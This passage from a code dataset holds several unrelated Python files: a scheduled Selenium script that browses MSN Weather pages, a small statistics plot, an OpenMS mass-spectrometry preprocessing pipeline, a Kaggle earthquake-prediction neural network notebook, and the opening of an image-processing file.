try_to_click(wait, By.XPATH, \"//button[@data-value='hourly']\")\n try_to_click(wait, By.XPATH, \"//*[@id='ForecastHourly']/div/ul/li[1]/button\")\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[2]\")\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_temp']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-1-g_precip']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-2-g_radar']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-3-g_wind']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-4-g_cloud']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-5-g_humidity']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-6-g_visibility']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-7-g_pressure']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-8-g_dewpoint']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-9-g_air_quality']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_hurricane']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-1-g_wildfire']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-2-g_winter_storm']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-3-g_severe_wea']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-4-g_earthquake']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_ski_resort']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_etree']\")\n \n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[4]\")\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[5]\")\n try_to_click(wait, By.XPATH, \"//*[@id='WeatherMonthCalendarSection']/div/div[2]/div/ul/li[2]/a\")\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[8]\")\n\n # try_to_click(wait, By.XPATH, \"//*[@id='overflowBtnId']/button\")\n # try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[12]\")\n elif task == 1:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[0]/div[5]/div[1]/div/div[1]/button\")\n close = False\n elif task == 2:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[1]/div[5]/div[1]/div/div[1]/button\")\n close = False\n elif task == 3:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[2]/div[5]/div[1]/div/div[1]/button\")\n close = False\n\n if not close:\n current_handles = driver.window_handles\n WebDriverWait(driver, 60*60).until(lambda d: current_handles != d.window_handles) # wait for 1 hour\n driver.quit()\n return True\n except Exception as e:\n print(f\"An error occurred: {e}\")\n driver.quit()\n\ndef try_to_click(wait, by, value):\n try:\n time.sleep(sleep)\n element = wait.until(EC.element_to_be_clickable((by, value)))\n time.sleep(sleep)\n element.click()\n except Exception as e:\n print(f\"An error occurred: {e}\")\n print(f\"Element with {by} = {value} didn't work\")\n\n\ndef get_all_tasks():\n with open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"r\") as file:\n data = file.read().split(\"\\n\")\n stored_date = datetime.strptime(data[4], \"%Y-%m-%d\").date()\n current_date = datetime.now().date()\n tasks = data[:4]\n if current_date > stored_date:\n tasks = [\"False\" for i in range(4)]\n with open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"w\") as file:\n file.write(\"\\n\".join(tasks + [current_date.strftime(\"%Y-%m-%d\")]))\n return tasks\n\ndef update_vars(task):\n tasks = get_all_tasks()\n tasks[task] = \"True\"\n current_date = datetime.now().date()\n with 
open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"w\") as file:\n file.write(\"\\n\".join(tasks + [current_date.strftime(\"%Y-%m-%d\")]))\n\ndef right_time(task):\n current_hour = time.localtime().tm_hour\n if task == 0:\n return True\n elif task == 1:\n return 8 <= current_hour < 10\n elif task == 2:\n return 12 <= current_hour < 14\n elif task == 3:\n return 16 <= current_hour < 18\n else:\n return False\n\ndef run_scheduler(stop_event):\n while not stop_event.is_set():\n tasks = [ast.literal_eval(x) for x in get_all_tasks()]\n for i, task in enumerate(tasks):\n if not task and right_time(i):\n if visit_msn_weather(i):\n update_vars(i)\n time.sleep(60*30)\n\n# start the scheduler thread\nstop_event = threading.Event()\nscheduler_thread = threading.Thread(target=run_scheduler, args=(stop_event,))\nscheduler_thread.start()\n\n#icon related code\n\ndef on_quit():\n stop_event.set()\n scheduler_thread.join()\n icon.stop()\n\ndef get_startup_status():\n key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_ALL_ACCESS)\n try:\n value = winreg.QueryValueEx(key, app_name)[0]\n return True\n except:\n return False\n\ndef startup_toggle(icon, item):\n global startup_status\n startup_status = not item.checked\n key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_ALL_ACCESS)\n if startup_status:\n value = os.path.join(os.getcwd(), \"visit_msn_weather.exe\")\n winreg.SetValueEx(key, app_name, 0, winreg.REG_SZ, value)\n else:\n winreg.DeleteValue(key, app_name)\n\nstartup_status = get_startup_status()\n\nimage = Image.open('E:/NdmGjr/visit_msn_weather/icon.png')\nicon = pystray.Icon(app_name, image, app_name)\nicon.menu = pystray.Menu(\n pystray.MenuItem(text=\"MSN Weather\", action=lambda: visit_msn_weather(None, False), default=True),\n pystray.MenuItem(\"Quit\", on_quit),\n pystray.MenuItem(\"Run at startup\", startup_toggle, checked=lambda item: startup_status)\n)\n\nicon.run()\n\n# pyinstaller --name visit_msn_weather main.py --icon=icon.png --noconsole --onefile\n\n","repo_name":"TechNerdXp/visit_msn_weather","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27695512993","text":"from pylab import *\n\nN = 50 \nS = 10000\nm = randint(-1,2,(N,S))\nprint(m[0:5,:])\nn = sum(m, axis=1)\nhist(n)\n\nhold('on')\nsn = linspace(-300,300,10000)\nplot(sn,exp(-2*sn**2/N), 'r-')\nshow()\n \n","repo_name":"magnusji/ubuntu","sub_path":"Documents/Termodynamics/oblig2/microstates.py","file_name":"microstates.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42499228658","text":"from __future__ import print_function\r\nimport os\r\nimport subprocess\r\nimport fileinput\r\nimport itertools\r\nimport pandas\r\n\r\n\r\n# create dict with entry for each node\r\n# in each entry dataframe as saved in setting folder\r\ndef determine_settings_combos(algorithms, OpenMS_par_dict, out_path):\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n\r\n param_dict_combined = {}\r\n for algorithm in algorithms:\r\n # extract parameters of node to do from config variable\r\n parameters = OpenMS_par_dict[algorithm]\r\n # return dict of combinations of parameters for one node\r\n settings_dict = combine_settings(parameters)\r\n settings_filepath = 
os.path.join(out_path, algorithm + '_settings.csv')\r\n\r\n        # if settings file already exists, combine settings so they won't be done again\r\n        if os.path.exists(settings_filepath):\r\n            # read in old settings file (pandas.DataFrame.from_csv was removed from pandas; read_csv with index_col=0 is the replacement)\r\n            df_settings_old = pandas.read_csv(settings_filepath, index_col=0)\r\n            # create dataframe from dict and concat old and new\r\n            df_settings_new = pandas.DataFrame.from_dict(settings_dict, orient='index')\r\n            df_settings_merged = pandas.concat([df_settings_old, df_settings_new])\r\n            # keep only rows whose settings (ignoring the Identifier column) are not duplicated\r\n            duplicated = df_settings_merged.loc[:, df_settings_merged.columns != 'Identifier'].duplicated()\r\n            non_duplicated = [not x for x in duplicated]\r\n            df_settings_merged = df_settings_merged[non_duplicated]\r\n            # read out identifiers in df, excluding empty entries\r\n            identifier = df_settings_merged.Identifier[[not x for x in df_settings_merged.Identifier.isnull()]].tolist()\r\n            # collect identifier values that are not yet in use\r\n            new_ids = [x for x in range(len(df_settings_merged)) if x not in identifier]\r\n            # append new ids to entries where identifier is empty\r\n            if len(new_ids) != 0:\r\n                new_settings = df_settings_merged.Identifier.isnull()\r\n                df_settings_merged.loc[new_settings, 'Identifier'] = new_ids\r\n            # turn type of identifiers back to integer\r\n            df_settings_merged['Identifier'] = df_settings_merged['Identifier'].astype(int)\r\n            df_settings_merged.to_csv(settings_filepath)\r\n            # merge new settings df with df of all settings\r\n            df_current_settings = pandas.concat([df_settings_new, df_settings_merged])\r\n            # select only duplicates of new settings\r\n            df_settings = df_current_settings[\r\n                df_current_settings.loc[:, df_current_settings.columns != 'Identifier'].duplicated()]\r\n            df_settings['Identifier'] = df_settings['Identifier'].astype(int)\r\n\r\n        # save settings as df to csv with identifiers assigned\r\n        else:\r\n            df_settings = pandas.DataFrame.from_dict(settings_dict, orient='index')\r\n            df_settings['Identifier'] = range(len(df_settings))\r\n            df_settings.to_csv(settings_filepath)\r\n\r\n        # add df for single node to dict\r\n        param_dict_combined[algorithm] = df_settings\r\n    return param_dict_combined\r\n\r\n\r\n# return dict of combinations of parameters for one node\r\ndef combine_settings(parameter_dict):\r\n    # keep track of order\r\n    parameter_list = []\r\n    keys_sorted = sorted([x for x in parameter_dict])\r\n    for key in keys_sorted:\r\n        parameters = parameter_dict[key] if isinstance(parameter_dict[key], list) else [parameter_dict[key]]\r\n        parameter_list.append(parameters)\r\n\r\n    # set combinations via cartesian product\r\n    combinations = list(itertools.product(*parameter_list))\r\n\r\n    # save name and settings in separate dict\r\n    counter = 0\r\n    single_settings_dict = {}\r\n    for i in combinations:\r\n        setting = {}\r\n        for j in range(len(keys_sorted)):\r\n            setting[keys_sorted[j]] = i[j]\r\n\r\n        single_settings_dict[str(counter)] = setting\r\n        counter += 1\r\n    return single_settings_dict\r\n\r\n\r\n# function for calling MSConvert on files in raw_dir\r\ndef convert_to_mzML(raw_dir, out_path, filetype='raw'):\r\n    # create list with all files in directory\r\n    files_list = os.listdir(raw_dir)\r\n\r\n    # subselect all raw files\r\n    raw_files_list = [x for x in files_list if ('.' 
+ filetype) in x]\r\n\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n # if output folder already there, check if same files\r\n # if all same end function, else give these to msconvert\r\n else:\r\n files_done = [x.split('.mzML')[0] for x in os.listdir(out_path)]\r\n raw_files_split = [x.split('.' + filetype)[0] for x in raw_files_list]\r\n not_done = [x for x in raw_files_split if not x in files_done]\r\n if len(not_done) == 0:\r\n return\r\n else:\r\n raw_files_list = [x + '.' + filetype for x in not_done]\r\n\r\n raw_files_list = [os.path.join(raw_dir, x) for x in raw_files_list]\r\n # write msconvert input file\r\n input_file_path = os.path.join(out_path, 'file_list.txt')\r\n input_file = open(input_file_path, 'w')\r\n for i in raw_files_list:\r\n input_file.write(\"%s\\n\" % i)\r\n input_file.close()\r\n\r\n # start process and print output\r\n convert = subprocess.Popen([\"msconvert\", '-f', input_file_path, '-o', out_path],\r\n stdout=subprocess.PIPE,\r\n universal_newlines=True)\r\n while True:\r\n line = convert.stdout.readline()\r\n if not line: break\r\n print(line, end='\\r')\r\n\r\n\r\n# wrapper for TOPP command line functions\r\n# functions which are built 'standard' should work\r\n#\r\n# in_path: string - path to folder of step before (with subfolders of diff parameters)\r\n# parameters: dict - name is name of option, after that value for option (numbers are converted to strings)\r\n# out_path: string - path to folder where results should be stored\r\n# algorithm: string - full name of algorithm which should be used\r\n# features_path: string - needed for HighResPrecursorMassCorrector, path where features are stored\r\n# out_type: string - needed for file converter, type for resulting file\r\ndef call_TOPP_tool(in_path, out_path, algorithm, num_threads, features_path='', out_type='.mgf', parameters=''):\r\n if os.path.exists(out_path):\r\n return\r\n else:\r\n os.makedirs(out_path)\r\n # generate input and output lists - return: mzml_files_list, out_files_list\r\n mzml_files_list, out_files_list = generate_in_out_list(mzml_in_path=in_path,\r\n out_path=out_path,\r\n algorithm=algorithm,\r\n out_type=out_type)\r\n # return feature files for single folders (work on this to select specific feature files corresponding to mzml)\r\n if algorithm == 'HighResPrecursorMassCorrector':\r\n featxml_files_list = generate_feature_files_list(features_in_path=features_path,\r\n mzml_files_list=mzml_files_list)\r\n else:\r\n featxml_files_list = ''\r\n\r\n # generate list of commands based on given parameternames and corresponding values\r\n commands_parameters = []\r\n if len(parameters) != 0:\r\n del parameters['Identifier']\r\n for i in range(len(parameters)):\r\n command = [parameters.index[i], str(parameters[i])]\r\n commands_parameters = commands_parameters + command\r\n\r\n for i in range(len(mzml_files_list)):\r\n # generate commands specific for single file\r\n all_commands = generate_commands(algorithm=algorithm, num_threads=num_threads,\r\n mzml_files_list=mzml_files_list,\r\n out_files_list=out_files_list, commands_parameters=commands_parameters,\r\n i=i, featxml_files_list=featxml_files_list)\r\n # call TOPP tool\r\n subprocess_TOPP(all_commands)\r\n\r\n\r\n# generate lists with full paths to single files (in and out respectivly)\r\ndef generate_in_out_list(mzml_in_path, out_path, algorithm, out_type):\r\n files_list = os.listdir(mzml_in_path)\r\n mzml_names_list = [x for x in files_list if '.mzML' in x]\r\n\r\n # generate output list, use different endings 
for some tools\r\n    if algorithm == 'FeatureFinderCentroided':\r\n        out_files_list = [os.path.join(out_path, x.replace('.mzML', '.featureXML')) for x in mzml_names_list]\r\n    elif algorithm == 'FileConverter':\r\n        out_files_list = [os.path.join(out_path, x.replace('.mzML', out_type)) for x in mzml_names_list]\r\n    else:\r\n        out_files_list = [os.path.join(out_path, x) for x in mzml_names_list]\r\n    mzml_files_list = [os.path.join(mzml_in_path, x) for x in mzml_names_list]\r\n\r\n    return mzml_files_list, out_files_list\r\n\r\n\r\n# return list of feature files (needed for HighResPrecursorMassCorrector)\r\ndef generate_feature_files_list(features_in_path, mzml_files_list):\r\n    feature_list = os.listdir(features_in_path)\r\n    featxml_names_list = [x for x in feature_list if '.featureXML' in x]\r\n    # match order to mzml\r\n    # extract names from mzml_files_list\r\n    mzml_names_list = list()\r\n    for i in range(len(mzml_files_list)):\r\n        name = os.path.split(mzml_files_list[i])[1]\r\n        name = name.split('.mzML')[0] + '.featureXML'\r\n        mzml_names_list = mzml_names_list + [name]\r\n\r\n    # match order of feature files to order of mzml files\r\n    featxml_names_list_sorted = list()\r\n    for i in mzml_names_list:\r\n        match = [x for x in featxml_names_list if i in x]\r\n        featxml_names_list_sorted = featxml_names_list_sorted + match\r\n\r\n    featxml_files_list = [os.path.join(features_in_path, x) for x in featxml_names_list_sorted]\r\n    return featxml_files_list\r\n\r\n\r\n# return list of commands to give to calling of TOPP tool\r\ndef generate_commands(algorithm, num_threads, mzml_files_list, out_files_list, commands_parameters, i,\r\n                      featxml_files_list):\r\n    if algorithm == 'FileConverter':\r\n        # FileConverter is called via its full install path here\r\n        algorithm = 'C:\\\\Program Files\\\\OpenMS-2.1.0\\\\bin\\\\' + algorithm\r\n    commands_general = [algorithm,\r\n                        '-threads', str(num_threads),\r\n                        '-in', mzml_files_list[i],\r\n                        '-out', out_files_list[i]]\r\n\r\n    if algorithm == 'HighResPrecursorMassCorrector':\r\n        commands_general = commands_general + ['-feature:in', featxml_files_list[i]]\r\n    all_commands = commands_general + commands_parameters\r\n\r\n    return all_commands\r\n\r\n\r\n# start subprocess for TOPP tool\r\ndef subprocess_TOPP(all_commands):\r\n    TOPP_tool = subprocess.Popen(all_commands, stdout=subprocess.PIPE, universal_newlines=True)\r\n    # print output of console\r\n    while True:\r\n        line = TOPP_tool.stdout.readline()\r\n        if not line: break\r\n        print(line, end='\\r')\r\n\r\n\r\ndef modify_scans(path, identifier, prefix='scan=', OpenMS_prefix=True):\r\n    files = os.listdir(path)\r\n    for filename in files:\r\n        if filename[:2] == 'PP': continue\r\n        if OpenMS_prefix:\r\n            newfilename = '_'.join(['OpenMS', identifier, '_'.join(filename.split('_')[:2])])\r\n        else:\r\n            newfilename = '_'.join(['other', identifier, '_'.join(filename.split('_')[:2])])\r\n        for line in fileinput.FileInput(os.path.join(path, filename), inplace=True):\r\n            if prefix in line:\r\n                Scan = line[line.find(prefix) + len(prefix):].split('_')\r\n                Scan[1] = newfilename\r\n                newline = line[:line.find(prefix)] + prefix + '_'.join(Scan)\r\n                print(newline, end='')  # newline already carries its trailing line break; a bare print would add a blank line\r\n            else:\r\n                print(line, end=\"\")\r\n        os.rename(os.path.join(path, filename),\r\n                  os.path.join(path, newfilename + '.mgf'))\r\n\r\n\r\ndef write_to_ID_table(file_dir, setting, ID_table):\r\n    result_dict = {}\r\n    # create list with all files in directory\r\n    files_list = os.listdir(file_dir)\r\n\r\n    files = [x for 
x in files_list if '.mgf' in x]\r\n\r\n for i in files:\r\n # for j in settings:\r\n result_dict[i + setting] = {'File': i, 'Algorithm': 'OpenMS',\r\n 'Setting': setting, 'ID': ''}\r\n\r\n df_settings = pandas.DataFrame.from_dict(result_dict, orient='index')\r\n df_ID_table = pandas.read_csv(ID_table,\r\n index_col=False, header=0)\r\n\r\n df_merged = pandas.concat([df_settings, df_ID_table])\r\n df_merged = df_merged[['File', 'Algorithm', 'Setting', 'ID']]\r\n df_merged.to_csv(ID_table, index=False)\r\n\r\n\r\ndef move_files(fileconv_path, out_path):\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n\r\n files_list = os.listdir(fileconv_path)\r\n\r\n for single_file in files_list:\r\n os.rename(os.path.join(fileconv_path, single_file),\r\n os.path.join(out_path, single_file))\r\n\r\n\r\ndef peakpickingonly(result_path, raw_dir, mzml_dir, nthreads, Top, Win):\r\n if not os.path.exists(result_path):\r\n os.makedirs(result_path)\r\n param_dict_combined = determine_settings_combos(\r\n algorithms=['SpectraFilter'],\r\n OpenMS_par_dict={'SpectraFilter': {'-algorithm:windowsize': Win,\r\n '-algorithm:peakcount': Top,\r\n '-algorithm:movetype': ['jump']}},\r\n out_path=os.path.join(result_path, 'Settings'))\r\n\r\n convert_to_mzML(raw_dir=raw_dir, out_path=mzml_dir)\r\n for SF_setting in param_dict_combined['SpectraFilter'].iterrows():\r\n call_TOPP_tool(algorithm='SpectraFilterWindowMower',\r\n in_path=mzml_dir,\r\n num_threads=nthreads,\r\n parameters=SF_setting[1],\r\n out_path=os.path.join(result_path, 'SpectraFilter'))\r\n\r\n # FileConverter\r\n call_TOPP_tool(algorithm='FileConverter',\r\n in_path=os.path.join(result_path, 'SpectraFilter'),\r\n num_threads=nthreads,\r\n out_type='.mgf',\r\n out_path=os.path.join(result_path, 'FileConverter'))\r\n\r\n modify_scans(path=os.path.join(result_path, 'FileConverter'),\r\n identifier='PPOnlyWin' + str(Win) + 'Top' + str(Top), OpenMS_prefix=False)\r\n\r\n move_files(fileconv_path=os.path.join(result_path, 'FileConverter'),\r\n out_path=os.path.join(os.path.split(result_path)[0], 'All_prepro_peakfiles',\r\n ('other_' + 'PPOnlyWin' + str(Win) + 'Top' + str(Top))))\r\n\r\n\r\ndef main(result_path, OpenMS_par_dict, raw_dir, mzml_dir, nthreads, keep_res):\r\n if not os.path.exists(result_path):\r\n os.makedirs(result_path)\r\n\r\n # save paths to all node folders\r\n result_folders = {}\r\n for folder in ['PeakPicker', 'FeatureFinder', 'MassCorrector', 'SpectraFilter', 'FileConverter']:\r\n result_folders[folder] = os.path.join(result_path, folder)\r\n if not os.path.exists(os.path.join(result_path, folder)):\r\n os.makedirs(os.path.join(result_path, folder))\r\n\r\n param_dict_combined = determine_settings_combos(\r\n algorithms=['PeakPicker', 'FeatureFinder', 'MassCorrector', 'SpectraFilter'],\r\n OpenMS_par_dict=OpenMS_par_dict,\r\n out_path=os.path.join(result_path, 'Settings'))\r\n\r\n # convert files\r\n convert_to_mzML(raw_dir=raw_dir, out_path=mzml_dir)\r\n\r\n # peakpickerhires\r\n for PP_setting in param_dict_combined['PeakPicker'].iterrows():\r\n PP_folder_ident = 'PP' + str(PP_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='PeakPickerHiRes',\r\n in_path=mzml_dir, num_threads=nthreads,\r\n parameters=PP_setting[1],\r\n out_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident))\r\n\r\n # featurefinderCentroided\r\n for FF_setting in param_dict_combined['FeatureFinder'].iterrows():\r\n FF_folder_ident = PP_folder_ident + '_FF' + str(FF_setting[1].Identifier)\r\n 
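#FF_setting comes from iterrows(): an (index, Series) pair where the Series maps command-line flags to values plus the 'Identifier' used in folder names\r\n        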
call_TOPP_tool(algorithm='FeatureFinderCentroided',\r\n in_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident),\r\n num_threads=nthreads,\r\n parameters=FF_setting[1],\r\n out_path=os.path.join(result_folders['FeatureFinder'], FF_folder_ident))\r\n\r\n # HighResPrecursorMassCorrector\r\n for MC_setting in param_dict_combined['MassCorrector'].iterrows():\r\n MC_folder_ident = FF_folder_ident + '_MC' + str(MC_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='HighResPrecursorMassCorrector',\r\n in_path=os.path.join(result_folders['PeakPicker'], PP_folder_ident),\r\n num_threads=nthreads,\r\n features_path=os.path.join(result_folders['FeatureFinder'], FF_folder_ident),\r\n parameters=MC_setting[1],\r\n out_path=os.path.join(result_folders['MassCorrector'], MC_folder_ident))\r\n\r\n # SpectralFilterWindowMower\r\n for SF_setting in param_dict_combined['SpectraFilter'].iterrows():\r\n SF_folder_ident = MC_folder_ident + '_SF' + str(SF_setting[1].Identifier)\r\n call_TOPP_tool(algorithm='SpectraFilterWindowMower',\r\n in_path=os.path.join(result_folders['MassCorrector'], MC_folder_ident),\r\n num_threads=nthreads,\r\n parameters=SF_setting[1],\r\n out_path=os.path.join(result_folders['SpectraFilter'], SF_folder_ident))\r\n\r\n # FileConverter\r\n call_TOPP_tool(algorithm='FileConverter',\r\n in_path=os.path.join(result_folders['SpectraFilter'], SF_folder_ident),\r\n num_threads=nthreads,\r\n out_type='.mgf',\r\n out_path=os.path.join(result_folders['FileConverter'], SF_folder_ident))\r\n if os.path.exists(os.path.join(result_folders['FileConverter'], SF_folder_ident)):\r\n modify_scans(path=os.path.join(result_folders['FileConverter'], SF_folder_ident),\r\n identifier=SF_folder_ident)\r\n move_files(fileconv_path=os.path.join(result_folders['FileConverter'], SF_folder_ident),\r\n out_path=os.path.join(os.path.split(result_path)[0], 'All_prepro_peakfiles',\r\n ('OpenMS_' + SF_folder_ident)))\r\n","repo_name":"Rappsilber-Laboratory/Xi-MPA_scripts","sub_path":"OpenMS.py","file_name":"OpenMS.py","file_ext":"py","file_size_in_byte":19194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71049471611","text":"\n\n\nfrom os import listdir, makedirs\n\nfrom os.path import isfile, join, basename, splitext, isfile, exists\n\n\n\nimport numpy as np\n\nimport pandas as pd\n\n\n\nfrom tqdm import tqdm_notebook\n\n\n\nimport tensorflow as tf\n\nimport keras.backend as K\n\n\n\nimport keras\n\nfrom keras.models import Sequential, Model\n\nfrom keras.layers import Dropout, Dense, Flatten, BatchNormalization\n\nfrom keras.layers import Convolution1D, ZeroPadding1D, MaxPooling1D, GlobalAveragePooling1D, GlobalMaxPooling1D\n\nfrom keras.layers import Concatenate, Average, Maximum, CuDNNLSTM, CuDNNGRU, Bidirectional, TimeDistributed\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint\n\nfrom keras.engine.input_layer import Input\n\nfrom keras.models import load_model\n\n\n\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\n\n\n\npd.set_option('precision', 30)\n\nnp.set_printoptions(precision = 30)\n\n\n\nnp.random.seed(7723)\n\ntf.set_random_seed(1090)\n\ntrain_df = pd.read_csv('../input/train.csv', dtype={'acoustic_data': np.int8, 'time_to_failure': np.float32})\ntrain_df.head()\nX_train = train_df.acoustic_data.values\n\ny_train = train_df.time_to_failure.values\nends_mask = np.less(y_train[:-1], y_train[1:])\n\nsegment_ends = np.nonzero(ends_mask)\n\n\n\ntrain_segments = []\n\nstart = 0\n\nfor end in 
segment_ends[0]:\n\n train_segments.append((start, end))\n\n start = end\n\n \n\nprint(train_segments)\nplt.title('Segment sizes')\n\n_ = plt.bar(np.arange(len(train_segments)), [ s[1] - s[0] for s in train_segments])\nclass EarthQuakeRandom(keras.utils.Sequence):\n\n\n\n def __init__(self, x, y, x_mean, x_std, segments, ts_length, batch_size, steps_per_epoch):\n\n self.x = x\n\n self.y = y\n\n self.segments = segments\n\n self.ts_length = ts_length\n\n self.batch_size = batch_size\n\n self.steps_per_epoch = steps_per_epoch\n\n self.segments_size = np.array([s[1] - s[0] for s in segments])\n\n self.segments_p = self.segments_size / self.segments_size.sum()\n\n self.x_mean = x_mean\n\n self.x_std = x_std\n\n\n\n def get_batch_size(self):\n\n return self.batch_size\n\n\n\n def get_ts_length(self):\n\n return self.ts_length\n\n\n\n def get_segments(self):\n\n return self.segments\n\n\n\n def get_segments_p(self):\n\n return self.segments_p\n\n\n\n def get_segments_size(self):\n\n return self.segments_size\n\n\n\n def __len__(self):\n\n return self.steps_per_epoch\n\n\n\n def __getitem__(self, idx):\n\n segment_index = np.random.choice(range(len(self.segments)), p=self.segments_p)\n\n segment = self.segments[segment_index]\n\n end_indexes = np.random.randint(segment[0] + self.ts_length, segment[1], size=self.batch_size)\n\n\n\n x_batch = np.empty((self.batch_size, self.ts_length))\n\n y_batch = np.empty(self.batch_size, )\n\n\n\n for i, end in enumerate(end_indexes):\n\n x_batch[i, :] = self.x[end - self.ts_length: end]\n\n y_batch[i] = self.y[end - 1]\n\n \n\n x_batch = (x_batch - self.x_mean)/self.x_std\n\n\n\n return np.expand_dims(x_batch, axis=2), y_batch\nt_segments = [train_segments[i] for i in [ 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]]\n\nv_segments = [train_segments[i] for i in [ 0, 1, 2, 3]]\nx_sum = 0.\n\ncount = 0\n\n\n\nfor s in t_segments:\n\n x_sum += X_train[s[0]:s[1]].sum()\n\n count += (s[1] - s[0])\n\n\n\nX_train_mean = x_sum/count\n\n\n\nx2_sum = 0.\n\nfor s in t_segments:\n\n x2_sum += np.power(X_train[s[0]:s[1]] - X_train_mean, 2).sum()\n\n\n\nX_train_std = np.sqrt(x2_sum/count)\n\n\n\nprint(X_train_mean, X_train_std)\ntrain_gen = EarthQuakeRandom(\n\n x = X_train, \n\n y = y_train,\n\n x_mean = X_train_mean, \n\n x_std = X_train_std,\n\n segments = t_segments,\n\n ts_length = 150000,\n\n batch_size = 64,\n\n steps_per_epoch = 400\n\n)\n\n\n\nvalid_gen = EarthQuakeRandom(\n\n x = X_train, \n\n y = y_train,\n\n x_mean = X_train_mean, \n\n x_std = X_train_std,\n\n segments = v_segments,\n\n ts_length = 150000,\n\n batch_size = 64,\n\n steps_per_epoch = 400\n\n)\ndef CnnRnnModel():\n\n i = Input(shape = (150000, 1))\n\n \n\n x = Convolution1D( 8, kernel_size = 10, strides = 10, activation='relu')(i)\n\n x = Convolution1D(16, kernel_size = 10, strides = 10, activation='relu')(x)\n\n x = Convolution1D(16, kernel_size = 10, strides = 10, activation='relu')(x)\n\n x = CuDNNGRU(24, return_sequences = False, return_state = False)(x)\n\n y = Dense(1)(x)\n\n\n\n return Model(inputs = [i], outputs = [y])\nmodel = CnnRnnModel()\n\nmodel.compile(loss='mean_absolute_error', optimizer='adam')\n\nmodel.summary()\nhist = model.fit_generator(\n\n generator = train_gen,\n\n epochs = 50, \n\n verbose = 0, \n\n validation_data = valid_gen,\n\n callbacks = [\n\n EarlyStopping(monitor='val_loss', patience = 5, verbose = 1),\n\n ModelCheckpoint(filepath='cnn_rnn.h5', monitor='val_loss', save_best_only=True, 
verbose=1)]\n\n)\nplt.plot(hist.history['loss'])\n\nplt.plot(hist.history['val_loss'])\n\nplt.title('Model loss')\n\nplt.ylabel('Loss')\n\nplt.xlabel('Epoch')\n\n_= plt.legend(['Train', 'Test'], loc='upper left')\ndef load_test(ts_length = 150000):\n\n    base_dir = '../input/test/'\n\n    test_files = [f for f in listdir(base_dir) if isfile(join(base_dir, f))]\n\n\n\n    ts = np.empty([len(test_files), ts_length])\n\n    ids = []\n\n    \n\n    i = 0\n\n    for f in tqdm_notebook(test_files):\n\n        ids.append(splitext(f)[0])\n\n        t_df = pd.read_csv(base_dir + f, dtype={\"acoustic_data\": np.int8})\n\n        ts[i, :] = t_df['acoustic_data'].values\n\n        i = i + 1\n\n\n\n    return ts, ids\ntest_data, test_ids = load_test()\nX_test = ((test_data - X_train_mean)/ X_train_std).astype('float32')\n\nX_test = np.expand_dims(X_test, 2)\n\nX_test.shape\nmodel = load_model('cnn_rnn.h5')\ny_pred = model.predict(X_test)\nsubmission_df = pd.DataFrame({'seg_id': test_ids, 'time_to_failure': y_pred[:, 0]})\nsubmission_df.to_csv(\"submission.csv\", index=False)","repo_name":"aorursy/new-nb-1","sub_path":"adubitskiy_rnn-with-cnn-feature-extraction.py","file_name":"adubitskiy_rnn-with-cnn-feature-extraction.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}\n+{"seq_id":"1640490545","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python3\nimport my\nimport cv2\nimport numpy as np\nimport time as t\nfrom datetime import datetime\nfrom skimage import io, color, morphology\nimport ia870 as ia\nimport skimage\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nimport queue\ndef close(im, kernel, iterations=1):\n    #morphological closing: dilation followed by erosion\n    #(note cv2.erode/dilate take iterations as a keyword; the third positional argument is dst)\n    imdil = 